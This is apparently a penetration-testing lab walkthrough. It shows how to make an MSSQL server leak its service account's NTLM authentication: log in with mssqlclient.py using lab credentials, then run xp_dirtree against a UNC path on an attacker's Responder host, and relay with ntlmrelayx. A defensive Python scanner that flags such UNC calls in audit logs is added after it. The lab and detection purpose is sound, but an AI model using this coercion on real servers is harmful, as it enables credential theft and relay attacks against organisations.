MSSQL Coerce and relay

  • MSSQL can also be used to coerce an NTLM authentication from the MSSQL server. The incoming connection will come from the account that runs the MSSQL service.

  • In our case, if we take any user, miguel.cabrera for example, we can get an NTLM authentication:

mssqlclient.py -windows-auth north.newyork.local/miguel.cabrera:ilovebaseball@yonkers.north.newyork.local

or

mssqlclient.py -windows-auth north.newyork.local/pacofish:pacofish@yonkers.north.newyork.local

  • Run an xp_dirtree command:

exec master.sys.xp_dirtree '\\192.168.56.31\demontlm',1,1

  • And we get a connection back to our Responder.

  • This also works with ntlmrelayx (for example, when the MSSQL service runs as an administrator account whose password is reused on other servers). But this kind of configuration is not set up in the lab yet.
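Seen from the defender's side, the coercion above leaves a trace in SQL Server auditing: a path-taking extended procedure called with a UNC target. The following Python is an added example (not part of the original notes) that scans such records; the `login|client_ip|statement` record format, the sample records and the NORTH NetBIOS name are constructed, and it also covers xp_fileexist and xp_subdirs, which behave like the xp_dirtree call above.

```python
import re

# Extended stored procedures that take a file-system path; given a UNC path
# the SQL Server service account authenticates to that host over SMB.
# xp_dirtree is the one used in the notes above; the other two behave alike.
PATH_XPS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")
XP_RE = re.compile(r"\b(" + "|".join(PATH_XPS) + r")\b", re.IGNORECASE)
# A UNC path: two backslashes, a host, optionally a backslash and a share name.
UNC_RE = re.compile(r"\\\\([^\\'\s]+)(?:\\([^\\'\s]*))?")

def check_statement(statement):
    """Return (xp_name, host, share) when a T-SQL statement calls one of
    PATH_XPS with a UNC path, else None. Local paths (C:\\...) are ignored
    because they trigger no outbound authentication."""
    xp = XP_RE.search(statement)
    if xp is None:
        return None
    unc = UNC_RE.search(statement)
    if unc is None:
        return None
    return (xp.group(1).lower(), unc.group(1), unc.group(2) or "")

def scan_audit(lines):
    """Parse constructed audit records 'login|client_ip|statement' and return
    one alert dict per statement that coerces an SMB authentication."""
    alerts = []
    for line in lines:
        login, client, statement = line.split("|", 2)
        hit = check_statement(statement)
        if hit is not None:
            alerts.append({"login": login, "client": client,
                           "xp": hit[0], "target": hit[1], "share": hit[2]})
    return alerts

# Constructed sample records (the NORTH NetBIOS name is assumed); the first
# is the xp_dirtree call from the notes above.
SAMPLE_AUDIT = [
    "NORTH\\miguel.cabrera|192.168.56.31|exec master.sys.xp_dirtree '\\\\192.168.56.31\\demontlm',1,1",
    "NORTH\\svc_report|10.0.0.5|EXEC xp_fileexist '\\\\fileserver\\reports\\q1.xlsx'",
    "NORTH\\app|10.0.0.6|exec master..xp_dirtree 'C:\\inetpub',1,1",
    "NORTH\\app|10.0.0.6|SELECT name FROM sys.databases",
]

if __name__ == "__main__":
    for alert in scan_audit(SAMPLE_AUDIT):
        print(f"{alert['login']} from {alert['client']} called {alert['xp']} "
              f"against \\\\{alert['target']}\\{alert['share']}")
```

A target host that is not a known file server, or a login that has no business calling these procedures, is the signal to investigate; the local-path call in the third record is deliberately not alerted.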

Responder hash location

/usr/share/responder/logs